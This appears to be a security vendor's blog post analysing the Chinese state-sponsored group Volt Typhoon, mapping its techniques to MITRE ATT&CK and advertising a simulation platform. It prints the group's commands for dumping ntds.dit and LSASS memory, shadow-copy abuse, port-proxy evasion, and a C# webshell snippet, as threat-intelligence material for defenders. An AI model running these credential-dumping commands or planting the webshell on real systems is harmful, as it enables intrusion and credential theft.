Volt Typhoon: The Chinese APT Group Abuse LOLBins for Cyber Espionage

Huseyin Can YUCEEL  By Huseyin Can YUCEEL  •  June 01, 2023

 

The Red Report 2024

The Top 10 MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD

On May 24th, 2023, The Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on a state-sponsored Chinese APT group, Volt Typhoon [1]. Volt Typhoon threat actors focus on cyber espionage campaigns that target critical infrastructure organizations in the United States and Asia region.  For their malicious operations, the APT group primarily uses Living Off The Land Binaries (LOLBins) to evade detection and remain undetected in their target's network.

In this blog post, we explained the tools and techniques used by Volt Typhoon and how they abuse Living Off The Land Binaries (LOLBins).

Simulate State-Sponsored Cyber Threats with 14-Day Free Trial of Picus Platform

Volt Typhoon: PRC State-Sponsored Cyber Espionage Group

Volt Typhoon (also known as BRONZE SILHOUETTE) is a People's Republic of China (PRC) state-sponsored APT group that focuses on stealthy and targeted cyber espionage campaigns against critical infrastructure organizations. The threat group has been actively targeting communications, construction, education, government, information technology, manufacturing, maritime, transportation, and utility sectors for nearly two years. 

The main objective of Volt Typhoon is to collect and exfiltrate sensitive information while avoiding detection. For this purpose, the APT group uses living-off-the-land techniques to mask their malicious activities as legitimate operations. The typical espionage campaign for Volt Typhoon follows initial access, living-off-the-land reconnaissance, lateral movement, and data exfiltration through C2 channels, in this order. In each step, adversaries use defense evasion techniques to hide their tracks.

Techniques and LOLBins used by Volt Typhoon

Initial Access

T1078 Valid Accounts & T1190: Exploit Public-Facing Application

Volt Typhoon gains initial access to their target's environment via stolen credentials of valid accounts. Also, Volt Typhoon is known to exploit public-facing Fortinet FortiGuard devices, ManageEngine ADSelfService Plus CVE-2021-40539 RCE, and FatPipe CVE-2021-27860 RCE vulnerabilities for initial access.

Execution

T1047 Windows Management Instrumentation

Adversaries use Windows Management Instrumentation for discovery, credential dumping, and command execution.

//Information gathering from compromised host
wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename

//Extracting ntds.dit for credential dumping
wmic process call create "ntdsutil \"ac i ntds\" ifm \"create full <filepath>

T1059 Command and Scripting Interpreter

Threat actors use PowerShell and Windows Command Shell to execute malicious commands in compromised hosts.

//Copying volume shadow copies
cmd /c vssadmin create shadow /for=C: > <filepath>

//Port forwarding for defense evasion
cmd.exe /c "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=<internal_ip_address> connectport=8443 protocol=tcp"

//Dumping LSASS memory for credential access
cmd.exe /c powershell -exec bypass -W hidden -nop -E rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 552 C:\Windows\Temp\vmware-vhost.dmp full

Persistence

T1505.003 Server Software Component: Web Shell

Volt Typhoon deploys backdoor web shells to maintain persistent access to compromised networks. The webshell appears to be a derivative of the Awen webshell that includes AES-encrypted or base64-encoded communication capabilities for C2. 

//Snippet from C# based Awen-derivative webshell

string ExcuteCmd (string arg)
{
char[] array ('c', 'm', 'd','.','e', 'x','e');
string cmd = new string (array);
ProcessStartInfo psi = new ProcessStartInfo ();
psi.FileName = cmd;
psi.Arguments = "/c "+ arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
psi.RedirectStandardError =true;
Process p = Process.Start(psi);
Streamreader stmrdr = p.StandardOutput;
string CmdOut= p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
string encmdout = Decrypt(CmdOut);
byte[] enbase64 = Encoding.Default.GetBytes(encmdout) ;
string enstr = Convert.ToBase64String(enbase64);
stmrdr.Close();
return enstr;
}

Defense Evasion

T1546 Hide Artifacts & T1070 Indicator Removal

Volt Typhoon selectively removes Windows Event Logs, system logs, artifacts, and other evidence of their malicious activity to hide their presence and limit threat- hunting activities.

Credential Access

T1003 OS Credential Dumping

As a cyber espionage group, Volt Typhoon gathers credentials of valid accounts in their victims' network. These credentials help them navigate and execute commands in the network without raising alerts. For credential dumping, they extract ntds.dit file and SYSTEM registry hive from Windows domain controllers or volume shadow copies. From the extracted ntds.dit and SECURITY files, Volt Typhoon harvest credentials of valid accounts.

//creating volume shadow copy
cmd /c vssadmin create shadow /for=C: > <filepath>

//extracting ntds.dit from shadow copy
cmd /c copy <VSS_path>\Windows\NTDS\ntds.dit C:\Windows\Temp > <filepath>

Discovery

Volt Typhoon enumerates compromised networks to discover users, hosts, and services. The gathered information is leveraged in data exfiltration and lateral movement phases of the attack campaign.

//T1033 System Owner/User Discovery

//T1069 Permission Groups Discovery

whoami

net localgroup administrators

net group /dom

net group "Domain Admins" /dom


//T1016 System Network Configuration Discovery

//T1082 System Information Discovery

arp -a

dnscmd . /enumrecords /zone {REDACTED}

ipconfig /all

netsh interface firewall show all

netsh interface portproxy show all

netsh interface portproxy show v4tov4

netsh firewall show all

netsh portproxy show v4tov4

netstat -ano

reg query hklm\software\

systeminfo

tasklist /v

wmic volume list brief

wmic service brief

wmic product list brief

wmic baseboard list full

Command and Control

T1090 Proxy

Volt Typhoon uses compromised small office/home office (SOHO) network devices as a proxy to hide the malicious traffic between their victims' network and C2 servers.

How Picus Helps Simulate Volt Typhoon Attacks?

We also strongly suggest simulating Volt Typhoon attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against hundreds of other state-sponsored threat actors, such as Lazarus, Turla, APT33, and Sandworm, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Volt Typhoon group

Threat ID

Threat Name

Attack Module

55804

Volt Typhoon Threat Group Campaign 2023 

Endpoint

69320

Volt Typhoon Threat Group Campaign Malware Download Threat

Network Infiltration

44146

Volt Typhoon Threat Group Campaign Malware Email Threat

Email Infiltration (Phishing

Picus Threat Library also includes threats for vulnerabilities exploited by Volt Typhoon:

Threat ID

Threat Name

Attack Module

62195

Zoho ManageEngine Web Attack Campaign

Exploited Vulnerability: CVE-2021-40539

Web Application

31317

FortiProxy Web Attack Campaign

Exploited Vulnerability: CVE-2022-42475

Web Application

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address malware and vulnerabilities exploited by the Volt Typhoon APT group in preventive security controls. Currently, Picus Labs validated the following signatures for Volt Typhoon and their toolset:

Security Control

Signature ID

Signature Name

CheckPoint NGFW

0959C2951

Generic.Win32.Volt Typhoon.TC.d91bxcpv

CheckPoint NGFW

0862738FC

Backdoor.Win32.Volt Typhoon.TC.09d6atYg

CheckPoint NGFW

097ECF5F3

Backdoor.Win32.Volt Typhoon.TC.eb4esBVo

CheckPoint NGFW

0D7987079

Backdoor.Win32.Volt Typhoon.TC.8e4fOBpT

CheckPoint NGFW

0FA988343

Backdoor.Win32.Volt Typhoon.TC.66f0xuMC

CheckPoint NGFW

0EF7FD024

Backdoor.Win32.Volt Typhoon.TC.6499KMVP

Cisco FirePower

1.300594.1

MALWARE-TOOLS Win.Proxy.frp download attempt

Cisco FirePower

1.58201.2

SERVER-WEBAPP Zoho ManageEngine ADSelfService Plus RestAPI authentication bypass attempt

ForcePoint NGFW

 

File_Malware-Blocked

ForcePoint NGFW

 

HTTP_CRL-Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass

ForcePoint NGFW

 

HTTP_CSU-Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass

Fortigate AV

4050557

Riskware/HackTool

Fortigate IPS

50773

ManageEngine.ADSelfService.Plus.RestAPI.Authentication.Bypass

FortiWeb

90501371

Known Exploits

Imperva SecureSphere

 

CVE-2021-40539: ManageEngine ADSelfService Plus REST API URLs Remote Authentication Bypass - Endpoint 1

Palo Alto

91676

ZOHOcorp ManageEngine Improper Authentication Vulnerability

Palo Alto

585502944

tool/Win32.kryptik.bavrw

Palo Alto

585824982

Trojan/Win64.wingoobfus.b

Palo Alto

585825012

Trojan/Win64.wingoobfus.c

Snort

1.61914.1

MALWARE-TOOLS Win.Proxy.frp download attempt

Snort

1.58201.2

SERVER-WEBAPP Zoho ManageEngine ADSelfService Plus RestAPI authentication bypass attempt

TippingPoint

42855

HTTP: Fortinet FortiOS Heap Buffer Overflow Vulnerability

Trellix

0x4840c900

MALWARE: Malicious File Detected by GTI

Trellix

0x4529eb00

HTTP: Zoho ManageEngine ADSelfService Plus Authentication Bypass Vulnerability

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial of the Picus Complete Security Validation Platform.

References

[1] "People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a

 
#Emerging Threat #Article #Blog

The Red Report 2024

The Top 10 MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD